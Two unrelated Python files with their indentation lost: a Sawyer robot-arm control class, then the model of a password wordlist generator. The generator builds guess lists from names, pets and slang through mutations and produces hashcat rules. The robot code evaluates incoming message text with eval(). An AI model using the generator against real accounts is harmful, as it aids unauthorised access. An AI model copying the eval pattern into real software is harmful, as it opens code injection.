trans = PyKDL.Vector(target_pos[0],target_pos[1],target_pos[2])
rot = PyKDL.Rotation.RPY(target_pos[3], target_pos[4],target_pos[5])
f2 = PyKDL.Frame(rot, trans)
if self._in_tip_frame:
# endpoint's cartesian systems
pose=posemath.toMsg(posemath.fromMsg(pose) * f2)
else:
# base's cartesian systems
pose=posemath.toMsg(f2 * posemath.fromMsg(pose))
else:
# global position : x, y, z, rx, ry, rz, rw
pose.position.x=target_pos[0]
pose.position.y=target_pos[1]
pose.position.z=target_pos[2]
pose.orientation.x=target_pos[3]
pose.orientation.y=target_pos[4]
pose.orientation.z=target_pos[5]
pose.orientation.w=target_pos[6]
#
###########################################
# set target position.
poseStamped=PoseStamped()
poseStamped.pose=pose
_waypoint.set_cartesian_pose(poseStamped, self._tip_name, [])
self._motion_trajectory.append_waypoint(_waypoint.to_msg())
#
# run motion...
self._light.head_green()
result=self._motion_trajectory.send_trajectory( wait_for_result=wait_for_result,timeout=tout)
#
if result is None:
self._light.head_yellow()
print("Trajectory FAILED to send")
return None
#
if not wait_for_result : return True
#
if result.result: self._light.head_on()
else: self._light.head_red()
#
self._motion_trajectory=None
return result.result
#
# stop motion...
def stop_trajectory(self):
if self._motion_trajectory :
self._motion_trajectory.stop_trajectory()
#
# set Interaction control
def set_interaction_params(self):
interaction_options = InteractionOptions()
interaction_options.set_interaction_control_active(self._interaction_active)
interaction_options.set_K_impedance(self._K_impedance)
interaction_options.set_max_impedance(self._max_impedance)
interaction_options.set_interaction_control_mode(self._interaction_control_mode)
interaction_options.set_in_endpoint_frame(self._in_endpoint_frame)
interaction_options.set_force_command(self._force_command)
interaction_options.set_K_nullspace(self._K_nullspace)
interaction_options.set_endpoint_name(self._endpoint_name)
if len(self._interaction_frame) == 7:
            quat_sum_square = sum(q * q for q in self._interaction_frame[3:7])
if quat_sum_square < 1.0 + 1e-7 and quat_sum_square > 1.0 - 1e-7:
interaction_frame = Pose()
interaction_frame.position.x = self._interaction_frame[0]
interaction_frame.position.y = self._interaction_frame[1]
interaction_frame.position.z = self._interaction_frame[2]
interaction_frame.orientation.w = self._interaction_frame[3]
interaction_frame.orientation.x = self._interaction_frame[4]
interaction_frame.orientation.y = self._interaction_frame[5]
interaction_frame.orientation.z = self._interaction_frame[6]
interaction_options.set_interaction_frame(interaction_frame)
else:
print('Invalid input to quaternion! The quaternion must be a unit quaternion!')
return None
else:
print('Invalid input to interaction_frame!')
return None
interaction_options.set_disable_damping_in_force_control(self._disable_damping_in_force_control)
interaction_options.set_disable_reference_resetting(self._disable_reference_resetting)
interaction_options.set_rotations_for_constrained_zeroG(self._rotations_for_constrained_zeroG)
return interaction_options
#
#
def set_interaction_mode(self):
pub = rospy.Publisher('/robot/limb/right/interaction_control_command', InteractionControlCommand, queue_size = 1)
interaction_options = self.set_interaction_params()
if interaction_options:
msg=interaction_options.to_msg()
pub.publish(msg)
#
#
def get_in_contact_opts(self):
interaction_options = self.set_interaction_params()
if interaction_options:
trajectory_options = TrajectoryOptions()
trajectory_options.interaction_control = True
trajectory_options.interpolation_type = self._trajType
trajectory_options.interaction_params = interaction_options.to_msg()
return trajectory_options
else:
return None
##############################################################
#
# Open the gripper
def gripper_open(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'grip' in self._gripper.get_ee_signals() :
self._gripper.set_ee_signal_value('grip', self._gripper_reverse)
else:
return None
else:
self._gripper.open()
return True
#
# Close the gripper
def gripper_close(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'grip' in self._gripper.get_ee_signals() :
print(self._gripper_reverse)
self._gripper.set_ee_signal_value('grip', not self._gripper_reverse)
else:
return None
else:
self._gripper.close()
return True
# Grippper vacuum: True:off, False:on
def gripper_vacuum(self, stat=True):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if 'vacuumOn' in self._gripper.get_ee_signals() :
self._gripper.set_ee_signal_value('vacuumOn', stat)
return self._gripper.get_ee_signal_value('vacuumOn')
return None
def is_gripping(self):
if self._gripper and self._gripper.is_ready():
if self._is_clicksmart:
if self._gripper.get_ee_signal_value('grip') is None:
return not self._gripper.get_ee_signal_value('vacuumOn')
else:
return self._gripper.get_ee_signal_value('grip')
else:
return self._gripper.is_gripping()
return None
###############################################################
#
# stop the thread of velocity control loop
def stop_vctrl(self):
self._running=False
self._vctrl_th.join()
self._vctrl_th=None
#
# start vctrl_loop with Thread
def start_vctrl(self, hz=100):
self._vctrl_th=threading.Thread(target=self.vctrl_loop, args=(hz,self.report,))
self._vctrl_th.start()
#
# velocity control mode, one cycle
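    # Proportional velocity law: dv = target - current joint angles. Once
    # ||dv|| drops below self._accuracy the arm is treated as settled (and the
    # optional callback fires); otherwise each joint is commanded a velocity
    # of dv * self._vrate, clamped to +/- (joint velocity limit * self._vmax).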
def _vctrl_one_cycle(self, func=None):
cmd={}
cur=self._limb.joint_ordered_angles()
dv=np.array(self._target) - np.array(cur)
if np.linalg.norm(dv) < self._accuracy:
if func:
func(self)
self._is_moving=False
else:
self._is_moving=True
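# simple proportional law: per-joint velocity = _vrate * position error,
# clamped to +/- (_vmax * per-joint velocity limit) in the loop below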
vels = list(map(lambda x: x*self._vrate, dv))
for i,name in enumerate(self._joint_names):
cmd[name]=maxmin(vels[i], self._velocity_limits[name]*self._vmax, -self._velocity_limits[name]*self._vmax)
self._limb.set_joint_velocities(cmd)
#
# velocity control loop
def vctrl_loop(self, hz, func=None):
rate=rospy.Rate(hz)
self._running=True
while self._running and (not rospy.is_shutdown()) :
cuff_state=self._cuff.cuff_button()
if cuff_state :
self.set_target()
elif self._limb.has_collided() :
self.set_target()
else:
self._vctrl_one_cycle(func)
rate.sleep()
self._limb.exit_control_mode()
print("Terminated")
#
# callback function for Subscriber
def set_target_joint_pos(self, data):
self._target=eval(data.data)
#
#
def set_next_target(self, data):
try:
self.unset_subscriber('current_joint_pos')
next_target=self._target_motion.pop(0)
self.set_target(next_target)
self.set_motion_sequencer()
except:
self.unset_subscriber('current_joint_pos')
pass
#
# Publish current position
def report(self,val):
cur=self._limb.joint_ordered_angles()
self._pub['current_joint_pos'].publish(str(cur))
#
# Set target joint positions (Publish target joint positions)
def set_target(self, val=None, relative=False):
if val is None:
val=self._limb.joint_ordered_angles()
if type(val) is str:
val=self._joint_positions[val]
elif relative:
if len(self._target) != len(val) :
print("Dimension mismatch")
return
for i,v in enumerate(self._target):
val[i]=v + val[i]
self._pub['target_joint_pos'].publish(str(val))
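# e.g. set_target() holds the current pose, set_target('home') looks up a
# named pose in self._joint_positions ('home' is an illustrative key), and
# set_target(offsets, relative=True) shifts the current target by the offsets.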
def set_target_seq(self, targets):
self._target_motion=targets
self.set_next_target('start')
def show_positions(self):
print(self._joint_positions.keys())
#
def set_cart_target(self, x,y,z,roll=0,pitch=0,yew=0, in_tip_frame=True):
#pose = self.convert_Cart2Joint(x,y,z, relative, end_point)
pos=self.calc_cart_move2joints(x,y,z,roll,pitch,yew, in_tip_frame=in_tip_frame)
val=self.joint_pos_d2l(pos)
self._pub['target_joint_pos'].publish(str(val))
#
# Set movement of target joint positions
def move_joint(self, idxs, vals):
for i,v in enumerate(idxs) :
self._target[v] += vals[i]
self._pub['target_joint_pos'].publish(str(self._target))
#
# end_point should be 'right_hand' or 'right_arm_base_link'.
def convert_Cart2Joint(self, x,y,z, relative=False, end_point='right_hand'):
_pose=self.endpoint_pose()
if relative:
_pose.position.x += x
_pose.position.y += y
_pose.position.z += z
else:
_pose.position.x = x
_pose.position.y = y
_pose.position.z = z
return self._limb.ik_request(_pose, end_point=end_point)
#
#
def convert_Joint2Cart(self, pos):
_pos=self._limb.joint_angles()
for i,name in enumerate(self._joint_names):
_pos[name]=pos[i]
return self._limb.joint_angles_to_cartesian_pose(_pos)
def endpoint_pose(self):
return self._limb.tip_state('right_hand').pose
#return self._limb.joint_angles_to_cartesian_pose(self._limb.joint_angles())
def calc_relative_pose(self, x,y,z,roll=0,pitch=0,yew=0, in_tip_frame=True):
_pose=self.endpoint_pose()
########################################
# set target position
trans = PyKDL.Vector(x,y,z)
rot = PyKDL.Rotation.RPY(roll,pitch,yew)
f2 = PyKDL.Frame(rot, trans)
if in_tip_frame:
# endpoint's cartesian systems
_pose=posemath.toMsg(posemath.fromMsg(_pose) * f2)
else:
# base's cartesian systems
_pose=posemath.toMsg(f2 * posemath.fromMsg(_pose))
return _pose
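# Frame algebra: with F the current endpoint pose and D the (trans, RPY)
# offset frame, in_tip_frame=True composes F*D (move in the hand frame),
# while in_tip_frame=False composes D*F (move in the base frame).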
def calc_cart_move2joints(self, x,y,z,roll=0,pitch=0,yew=0, in_tip_frame=True):
_pose=self.calc_relative_pose(x,y,z,roll,pitch,yew, in_tip_frame)
return self._limb.ik_request(_pose)
########################################################################
#
# onExecuted
#
def onExecute(self):
cuff_state=self._cuff.cuff_button()
if self._is_pause :
self._limb.set_joint_velocities(self._stop_cmd)
elif cuff_state :
self.set_target()
elif self._limb.has_collided() :
self.set_target()
else:
self._vctrl_one_cycle(self.report)
#
# for RTC(Common)
#
def clearAlarms(self):
print('No alarm.')
return True
def getActiveAlarm(self):
res=[]
return res
def getFeedbackPosJoint(self):
res=list(map(lambda x: np.rad2deg(x), self._limb.joint_ordered_angles()))
res.append(self.gripper_state())
return res
# manufacturer: string
# type: string
# axisNum: ULONG
# cmdCycle: ULONG
# isGripper: boolean
def getManipInfo(self):
if self._gripper :
res=['RethinkRobotics', 'Sawyer', 7, 100, True]
else:
res=['RethinkRobotics', 'Sawyer', 7, 100, False]
return res
def getSoftLimitJoint(self):
return None
def getState(self):
stat=self._rs.state()
if stat.enabled :
res=0x01
if self._is_moving :
res=0x01 | 0x02
else:
res=0x00
return res
def servoOFF(self):
return None
def servoON(self):
return None
def setSoftLimitJoint(self, softLimit):
return None
#
# for RTC(Middle)
#
def openGripper(self):
if self._gripper_type == 'vacuum':
self.gripper_vacuum(False)
else:
self.gripper_open()
return True
def closeGripper(self):
if self._gripper_type == 'vacuum':
self.gripper_vacuum(True)
else:
self.gripper_close()
return True
def moveGripper(self, angleRatio):
print('Move gripper is not supported')
return None
def getBaseOffset(self):
return None
def getFeedbackPosCartesian(self):
return None
def getMaxSpeedCartesian(self):
return None
def getMaxSpeedJoint(self):
return None
def getMinAccelTimeCartesian(self):
return None
def getMinAccelTimeJoint(self):
return None
def getSoftLimitCartesian(self):
return None
def moveLinearCartesianAbs(self, carPos, elbow, flag):
return None
def moveLinearCartesianRel(self, carPos, elbow, flag):
return None
def movePTPCartesianAbs(self, carPos, elbow, flag):
mx=np.array(carPos)
pos=mx[:,3]
mx=np.vstack((mx, [0,0,0,1]))
qtn=tf.transformations.quaternion_from_matrix(mx)
pose=newPose(pos, qtn)
pos=self._limb.ik_request(pose)
self._target=self.joint_pos_d2l(pos)
return None
def movePTPCartesianRel(self, carPos, elbow, flag):
ep=self.endpoint_pose()
mx=np.array(carPos)
pos=mx[:,3]
mx=np.vstack((mx, [0,0,0,1]))
qtn=tf.transformations.quaternion_from_matrix(mx)
dp=newPose(pos, qtn)
pose=addPose(ep, dp)
pos=self._limb.ik_request(pose)
self._target=self.joint_pos_d2l(pos)
return None
def movePTPJointAbs(self, jointPoints):
if len(jointPoints) >= 7:
pos=list(map(lambda x: np.deg2rad(x), jointPoints[:7]))
self._target=pos
return True
else:
return False
def movePTPJointRel(self, jointPoints):
if len(jointPoints) >= 7:
pos=list(map(lambda x: np.deg2rad(x), jointPoints[:7]))
self._target=np.array(self._target) + np.array(pos)
return True
else:
return False
def pause_motion(self):
self._is_pause=True
self._limb.set_joint_velocities(self._stop_cmd)
return True
def resume_motion(self):
self._is_pause=False
return True
def stop_motion(self):
self.set_target()
return True
def setAccelTimeCartesian(self, aclTime):
return None
def setAccelTimeJoint(self, aclTime):
return None
def setBaseOffset(self, offset):
return None
def setControlPointOffset(self, offset):
return None
def setMaxSpeedCartesian(self, sp_trans, sp_rot):
return None
def setMaxSpeedJoint(self, speed):
return None
def setMinAccelTimeCartesian(self, aclTime):
return None
def setMinAccelTimeJoint(self, aclTime):
return None
def setSoftLimitCartesian(self, xLimit, yLimit, zLimit):
return None
def setSpeedCartesian(self, spdRatio):
return None
def setSpeedJoint(self, spdRatio):
self.set_speed(spdRatio)
return True
def moveCircularCartesianAbs(self, carPointR, carPointT):
return None
def moveCircularCartesianRel(self, carPointR, carPointT):
return None
def setHome(self, jointPoint):
self._home_pos=jointPoint
return True
def getHome(self):
return self._home_pos
def goHome(self):
self._target=self._home_pos
return True
########################################################################
#
# LED Light of the Head
#
class SawyerLight(object):
def __init__(self, enabled=True):
self._light=intera_interface.Lights()
self._enabled=enabled
#
# when using the Gazebo simulator, you may need to disable the light...
def enabled(self, val=True):
self._enabled=val
#
# Yellow
###########################
def head_yellow(self):
if self._enabled:
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_red_light',True)
self._light.set_light_state('head_green_light',True)
#
#
def head_blue(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',True)
#
#
def head_green(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_green_light',True)
#
#
def head_red(self):
if self._enabled:
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_red_light',True)
#
# White
def head_on(self):
if self._enabled:
self._light.set_light_state('head_red_light',True)
self._light.set_light_state('head_green_light',True)
self._light.set_light_state('head_blue_light',True)
#
# Turn off
def head_off(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',False)
###########################
#########
import PIL.Image,PIL.ImageFont, PIL.ImageDraw
class SawyerDisplay(object):
def __init__(self):
self._image_pub=rospy.Publisher('/robot/head_display', Image, latch=True, queue_size=10)
self._fontname='/usr/share/fonts/truetype/takao-gothic/TakaoGothic.ttf'
if not os.path.exists(self._fontname):
self._fontname='/usr/share/fonts/opentype/NotoSansCJK-Regular.ttc'
self._font24=PIL.ImageFont.truetype(self._fontname, 24, encoding='unic')
self._font32=PIL.ImageFont.truetype(self._fontname, 32, encoding='unic')
self._font42=PIL.ImageFont.truetype(self._fontname, 42, encoding='unic')
self._font48=PIL.ImageFont.truetype(self._fontname, 48, encoding='unic')
self._font64=PIL.ImageFont.truetype(self._fontname, 64, encoding='unic')
self._font=self._font42
self._image=self.mkImage()
self._draw=None
self._sdk_img='sawyer_sdk_research.png'
def mkImage(self, val=128):
img=np.full((600,1024,3), val, dtype=np.uint8)
return img
def mkPILImage(self, val=128):
img=PIL.Image.new('RGB',(1024,600), color=(val,val,val))
self._draw=PIL.ImageDraw.Draw(img)
return img
def clear(self):
self._image=self.mkImage()
self.update()
def update(self):
self.showImage()
def convert2cv(self):
if isinstance(self._image, PIL.Image.Image) :
self._image=np.asarray(self._image)
self._draw=None
def convert2PIL(self):
if self._draw is None:
self._image=PIL.Image.fromarray(self._image)
self._draw=PIL.ImageDraw.Draw(self._image)
def drawText(self, txt, x, l, clear=False):
if clear: self._image=self.mkPILImage()
self.convert2PIL()
pos=(20+x, l*50)
self._draw.text(pos, txt, font=self._font, fill='#ffffff')
self.update()
def drawEllipse(self, param, fill=(255,0,0), outline=(0,0,0), clear=False):
if clear: self._image=self.mkPILImage()
self.convert2PIL()
self._draw.ellipse(param, fill=fill, outline=outline)
self.update()
def putText(self, txt, x, l, clear=False):
if clear: self._image=self.mkImage()
self.convert2cv()
pos=(20+x, l*50)
cv2.putText(self._image, txt, pos, cv2.FONT_HERSHEY_SIMPLEX, 1.2, (255,255,255), 2, cv2.LINE_AA)
self.update()
def showDefault(self):
self.showImage(self._sdk_img)
def showImage(self, img=None):
if img is None:
img=self._image
elif type(img) is str:
img=cv2.imread('images/'+img)
if isinstance(img, PIL.Image.Image):
img=np.asarray(img)
if not rospy.is_shutdown():
cv_img=cv_bridge.CvBridge().cv2_to_imgmsg(img, encoding="bgr8")
self._image_pub.publish(cv_img)
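#
# Usage sketch (illustrative; requires an initialized rospy node):
#   disp = SawyerDisplay()
#   disp.drawText(u'Hello Sawyer', 0, 1, clear=True)
#   disp.showDefault()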
####################################
# Function....
def maxmin(v, mx, mn):
return np.max([np.min([v,mx]), mn])
def newPose(p, qtn):
res=Pose()
res.position.x=p[0]
res.position.y=p[1]
res.position.z=p[2]
res.orientation.x=qtn[0]
res.orientation.y=qtn[1]
res.orientation.z=qtn[2]
res.orientation.w=qtn[3]
return res
def addPose(p1, p2):
res=Pose()
res.position.x=p1.position.x+p2.position.x
res.position.y=p1.position.y+p2.position.y
res.position.z=p1.position.z+p2.position.z
res.orientation.x=p1.orientation.x+p2.orientation.x
res.orientation.y=p1.orientation.y+p2.orientation.y
res.orientation.z=p1.orientation.z+p2.orientation.z
res.orientation.w=p1.orientation.w+p2.orientation.w
return res
|
model.py
|
#! /usr/bin/env python
import os
import threading
from abc import abstractmethod
import calendar
import datetime
import inspect
import copy
import sys
script_dir = os.path.dirname(os.path.realpath(__file__))
data_dir = os.path.join(script_dir, 'data')
class Serializable(object):
'''
Helper class for serializing chains. Only subclasses and allowed_typenames
are allowed to be serialized, avoiding the security problems of pickle.
'''
allowed_typenames = ['NoneType', 'bool', 'int', 'str', 'list']
def chain_as_string_dict(chain, version):
'''Gets a representation of the chain as a dictionary of strings
'''
chain_dict = {'nodes': [], 'version': version}
for node in chain.nodes:
node_dict = {'attributes': []}
class_name = node.__class__.__name__
if class_name == 'BaseNode':
node_dict['type_'] = 'base'
elif class_name == 'MutateNode':
if node.is_case:
node_dict['type_'] = 'Case'
else:
node_dict['type_'] = 'Substitution'
elif class_name == 'AddNode':
if node.prepend:
node_dict['type_'] = 'Prepend'
else:
node_dict['type_'] = 'Append'
for attr in node.attrs:
attr_dict = {'class_name': attr.__class__.__name__,
'kwargs': {}}
# Get all of the members with names matching args to __init__
for name in inspect.getargspec(attr.__class__.__init__)[0]:
if name in ['self', 'controller']:
continue
val = attr.__dict__[name]
val_class_name = val.__class__.__name__
if val_class_name not in Serializable.allowed_typenames:
raise Exception('Cannot serialize attr of class:',
val_class_name)
attr_dict['kwargs'][name] = val
node_dict['attributes'].append(attr_dict)
chain_dict['nodes'].append(node_dict)
return chain_dict
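# Shape sketch of the returned dictionary (illustrative values):
#   {'version': ..., 'nodes': [
#       {'type_': 'base', 'attributes': [
#           {'class_name': 'StringListAttr',
#            'kwargs': {'strings': ['password'], 'label': ''}}]}]}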
def load_string_dict(d, controller):
'''Re-creates the chain from a dictionary of strings by calling
add_node() and add_attr() on the controller
'''
# Get the names of all subclasses of Serializable
def get_subclasses(class_):
sub = {class_.__name__}
for subclass in class_.__subclasses__():
sub.update(get_subclasses(subclass))
return sub
allowed_classes = get_subclasses(Serializable)
if len(d['nodes']) == 0 or d['nodes'][0]['type_'] != 'base':
raise Exception('The chain must start with a BaseNode')
for node_dict in d['nodes']:
controller.add_node(type_=node_dict['type_'])
for attr_dict in node_dict['attributes']:
class_name = attr_dict['class_name']
if class_name in allowed_classes:
attr_class = globals()[class_name]
if issubclass(attr_class, ThreadingAttr):
attr_dict['kwargs']['controller'] = controller
controller.add_attr(node_view=controller.mainview.nodes[-1],
attr_class=attr_class,
**attr_dict['kwargs'])
controller.update_counts()
class Chain(Serializable):
'''A chain is a sequence of nodes that produces output words
'''
def __init__(self):
self.nodes = []
self.baseword_count_ = None
def add_node(self, node):
self.nodes.append(node)
self.baseword_count_ = None
def remove_node(self, idx):
for attr in self.nodes[idx].attrs:
attr.stop_calculating() # Stop counting words in FileAttr
del self.nodes[idx]
self.baseword_count_ = None
def get_words(self, basewords_only=False):
'''A generator that yields the chain's words
'''
for attr in self.nodes[0].attrs:
attr.words_read = 0
if basewords_only:
for word in self.nodes[0].get_words([]):
yield word
else:
words = []
for node in self.nodes:
words = node.get_words(words)
for word in words:
yield word
def count_words(self):
'''Returns the total number of words produced by this chain
'''
count = 0
for node in self.nodes:
count = node.count_words(count)
return count
def count_bytes(self):
'''Returns the estimated size in bytes of the password file output
'''
word_count = 0
byte_count = 0
for node in self.nodes:
byte_count = node.count_bytes(byte_count, word_count)
word_count = node.count_words(word_count)
if byte_count > 0:
byte_count += word_count # count the newline characters
return byte_count
def check_hashcat_compatible(self):
'''Returns True if all nodes and their attributes can be turned into
hashcat rules
'''
result = True
for node in self.nodes:
result = result and node.check_hashcat_compatible()
return result
def get_rules(self):
'''Generates a hashcat rulefile representing the chain
return value: the rulefile string
'''
# build up lines of the rule file
# each line is a list of strings
lines = [[]]
for node in self.nodes:
lines = node.get_rules(lines)
return '\n'.join([''.join(line) for line in lines]) + '\n'
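# e.g. a base node followed by an All/Uppercase case node and an Append('1')
# node yields the single rule line 'u$1'; multiple attrs per node multiply
# out into one rule line per combination.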
def get_progress_percent(self):
'''While get_words is generating output words, this returns an estimate
(integer percent) of how close to completion it is.
'''
if self.baseword_count_ is None:
self.baseword_count_ = 0
for attr in self.nodes[0].attrs:
if attr.calculating:
self.baseword_count_ = None
break
else:
self.baseword_count_ += attr.count_words(0)
if self.baseword_count_ is None:
return 0
else:
progress_count = 0
for attr in self.nodes[0].attrs:
progress_count += attr.words_read
return int(100. * progress_count / self.baseword_count_)
class DuplicateAttrException(Exception):
'''Raised in a node's add_attr to indicate that an identical attribute is
already present
'''
pass
class BaseNode(Serializable):
'''A node produces output words, and may take input words which it may
modify and then output them.
'''
def __init__(self, is_root=True):
'''is_root: bool, whether this is the first attr in the chain
'''
self.is_root = is_root
self.attrs = []
def add_attr(self, attr):
'''Add an attribute to the node. May raise DuplicateAttrException.
'''
if attr in self.attrs:
raise DuplicateAttrException()
else:
self.attrs.append(attr)
def get_words(self, prev_words):
'''A generator that yields the node's words, given the sequence of
input words prev_words
'''
if self.is_root:
assert len(list(prev_words)) == 0 # there cannot be any previous words
for attr in self.attrs:
for word in attr.get_words(prev_words):
yield word
def count_words(self, prev_word_count):
'''Estimates the number of words generated by this node
'''
if self.is_root:
assert prev_word_count == 0
if len(self.attrs) == 0:
return prev_word_count
else:
count = 0
for attr in self.attrs:
count += attr.count_words(prev_word_count)
return count
def count_bytes(self, prev_byte_count, prev_word_count):
'''Estimates the number of bytes in the words generated by this node
'''
if self.is_root:
assert prev_byte_count == 0
byte_count = prev_byte_count
for attr in self.attrs:
byte_count += attr.count_bytes(prev_byte_count, prev_word_count)
return byte_count
def check_hashcat_compatible(self):
result = True
for attr in self.attrs:
result = result and attr.check_hashcat_compatible()
return result
def get_rules(self, lines):
return [[]]
class MutateNode(BaseNode):
'''Changes the characters in the word, including changing the case of
letters and substituting one character for another
'''
def __init__(self, is_case=False):
self.is_case = is_case
BaseNode.__init__(self, is_root=False)
def get_words(self, prev_words):
if len(self.attrs) == 0:
for word in prev_words:
yield word
else:
dedupe = True
if dedupe and len(self.attrs) > 1:
for prev_word in prev_words:
new_words = set()
for attr in self.attrs:
for word in attr.get_words([prev_word]):
new_words.update([word])
for word in new_words:
yield word
else:
for prev_word in prev_words:
for attr in self.attrs:
for word in attr.get_words([prev_word]):
yield word
def count_words(self, prev_word_count):
if len(self.attrs) == 0:
return prev_word_count
if self.is_case:
return BaseNode.count_words(self, prev_word_count)
else:
# Use heuristics to estimate Substitution word count
count = 0
for attr in self.attrs:
if isinstance(attr, NothingMutatorAttr):
count = 1 * prev_word_count
break
for attr in self.attrs:
if isinstance(attr, SubstitutionAttr):
for f in attr.character_freqs:
if count == 0:
count = 1 * prev_word_count
else:
count += int(f * prev_word_count)
return count
def count_bytes(self, prev_byte_count, prev_word_count):
if len(self.attrs) == 0:
return prev_byte_count
if self.is_case:
byte_count = 0
for attr in self.attrs:
byte_count += attr.count_bytes(prev_byte_count, prev_word_count)
else:
byte_count = 0
for attr in self.attrs:
if isinstance(attr, NothingMutatorAttr):
byte_count = 1 * prev_byte_count
break
for attr in self.attrs:
if isinstance(attr, SubstitutionAttr):
for f in attr.character_freqs:
if byte_count == 0:
byte_count = prev_byte_count
else:
byte_count += int(f * prev_byte_count)
return byte_count
def get_rules(self, lines):
new_lines = []
if len(self.attrs) == 0:
for line in lines:
new_lines.append(line + [':'])
for attr in self.attrs:
attr_lines = attr.get_rules()
for attr_line in attr_lines:
for line in lines:
new_line = copy.copy(line)
new_line.append(attr_line)
new_lines.append(new_line)
return new_lines
class AddNode(BaseNode):
'''Append or prepend a string to the word
'''
def __init__(self, prepend=False):
BaseNode.__init__(self, is_root=False)
self.prepend = prepend
def get_words(self, prev_words):
if len(self.attrs) == 0:
for word in prev_words:
yield word
for word in prev_words:
for attr in self.attrs:
for other_word in attr.get_words([]):
if self.prepend:
yield other_word + word
else:
yield word + other_word
def count_words(self, prev_word_count):
if len(self.attrs) == 0:
return prev_word_count
multiplier = 0
for attr in self.attrs:
multiplier += attr.count_words(0)
return multiplier * prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
if len(self.attrs) == 0:
return prev_byte_count
attr_word_count = 0
attr_byte_count = 0
for attr in self.attrs:
attr_word_count += attr.count_words(0)
attr_byte_count += attr.count_bytes(0, 0)
return attr_word_count * prev_byte_count + prev_word_count * attr_byte_count
def get_rules(self, lines):
new_lines = []
if len(self.attrs) == 0:
for line in lines:
new_lines.append(line + [':'])
for attr in self.attrs:
if isinstance(attr, NothingAdderAttr):
for line in lines:
new_lines.append(line + [':'])
else:
for word in attr.get_words([]):
for line in lines:
new_line = copy.copy(line)
if self.prepend:
command = '^'
# hashcat applies each '^' rule to the front in turn, so the
# characters must be emitted in reverse order
chars = word[::-1]
else:
command = '$'
chars = word
new_line.extend([command + c for c in chars])
new_lines.append(new_line)
return new_lines
class BaseAttr(Serializable):
'''An attribute defines the behavior of the node. Typically each attribute
produces one or more words.
'''
def __init__(self, label=""):
self.label = label
self.calculating = False
@abstractmethod
def get_words(self, prev_words):
pass
@abstractmethod
def count_words(self, prev_word_count):
pass
@abstractmethod
def count_bytes(self, prev_byte_count, prev_word_count):
pass
def check_hashcat_compatible(self):
return True
def __eq__(self, other):
'''This is used to avoid duplicate attributes within a node
'''
if self.__class__ != other.__class__:
return False
# This checks whether the two attributes have the same values for their
# __init__ arguments (like in serialization)
result = True
for name in inspect.getargspec(self.__class__.__init__)[0]:
if name in ['self', 'controller']:
continue
if (name in other.__dict__) and (self.__dict__[name] != other.__dict__[name]):
result = False
return result
def __ne__(self, other):
return not self == other
def stop_calculating(self):
'''Stop calculating word counts (only needed for FileAttr)
'''
pass
class StringListAttr(BaseAttr):
def __init__(self, strings, label=""):
BaseAttr.__init__(self, label)
self.strings = strings
self.byte_count = sum(map(len, self.strings))
self.words_read = None # used for the progress indicator
def get_words(self, prev_words=[]):
self.words_read = 0
for word in prev_words:
yield word
for s in self.strings:
self.words_read += 1
yield s
def count_words(self, prev_word_count):
return prev_word_count + len(self.strings)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
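# e.g. StringListAttr(['password', 'letmein']) yields both strings after any
# prev_words and reports 15 bytes (8 + 7, newlines excluded).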
class ThreadingAttr(BaseAttr):
'''This indicates that the derived class calculates its word count in
a background thread, takes a controller instance and communicates with it
when it is done calculating
'''
def stop_calculating(self):
self.kill_flag = True
self.worker_thread.join()
'''
def __del__(self):
# note that __del__ is not always called immediately with 'del'
self.stop_calculating()
'''
class FileException(Exception):
'''This is raised when any sort of exception occurs with FileAttr's file
'''
pass
class FileAttr(ThreadingAttr):
'''Generates one word for each line in a file
'''
# named_files is read by the GUI to generate the file menus
named_files = [['English Dictionary', '$DATA_DIR/English_Dict.txt'],
['Common Names', [['Men', '$DATA_DIR/Common_Names_Men.txt'],
['Women', '$DATA_DIR/Common_Names_Women.txt'],
['Pets', '$DATA_DIR/Common_Names_Pets.txt']]],
['Other', [['Slang & Expletives', '$DATA_DIR/Slang_And_Expletives.txt'],
['Months & Seasons', '$DATA_DIR/Months_And_Seasons.txt']]]
]
def __init__(self, path, controller=None, label=""):
BaseAttr.__init__(self, label)
self.path = path
self.controller = controller
self.absolute_path = path.replace('$DATA_DIR', data_dir)
self.file_error = None
try:
self.byte_count = os.stat(self.absolute_path).st_size
# Windows seems to always report an extra two bytes
if sys.platform == 'win32':
self.byte_count -= 2
except Exception as e:
self.file_error = str(e)
self.word_count = 0
self.byte_count = 0
# This is used by the progress bar to keep track of how many lines
# have been read in get_words(). It is reset when the file is done.
self.words_read = None
self.word_count = 1
self.calculating = True
if self.controller is not None:
self.controller.word_calculator_count += 1
self.controller.update_counts() # update word counts to 'Calculating...'
self.worker_thread = threading.Thread(target=self.threaded_word_counter)
self.kill_flag = False
else:
# When there is no controller (in model tests), run the word counter
# in the main thread
self.kill_flag = False
self.threaded_word_counter()
if self.controller is not None:
self.worker_thread.start()
def check_file(self):
'''Check whether the file is present
'''
try:
os.stat(self.absolute_path)
except Exception as e:
self.file_error = str(e)
def threaded_word_counter(self):
'''In order to estimate the number of words, this method is run in a
background thread and reads the number of lines in the input file.
'''
if self.file_error is not None:
if self.controller is not None:
self.controller.word_calculator_count -= 1
return
try:
i = 0
try:
with open(self.absolute_path, errors='ignore') as f:
for i, line in enumerate(f):
if self.kill_flag:
break
except Exception as e:
self.file_error = str(e)
if self.controller is not None:
self.controller.file_attr_error(self)
return
i += 1
self.word_count = i
self.byte_count -= self.word_count - 1 # don't count newlines
self.calculating = False
if self.controller is not None:
self.controller.word_calculator_count -= 1
self.controller.update_counts()
except Exception as e:
print("Exception while counting words:", e)
def get_words(self, prev_words=[]):
self.words_read = 0
for word in prev_words:
yield word
try:
for line in open(self.absolute_path, errors='surrogateescape'):
if line[-1] == '\n':
line = line[:-1]
self.words_read += 1
yield line
except Exception as e:
self.file_error = str(e)
if self.controller:
self.controller.file_attr_error(self)
raise FileException()
else:
raise
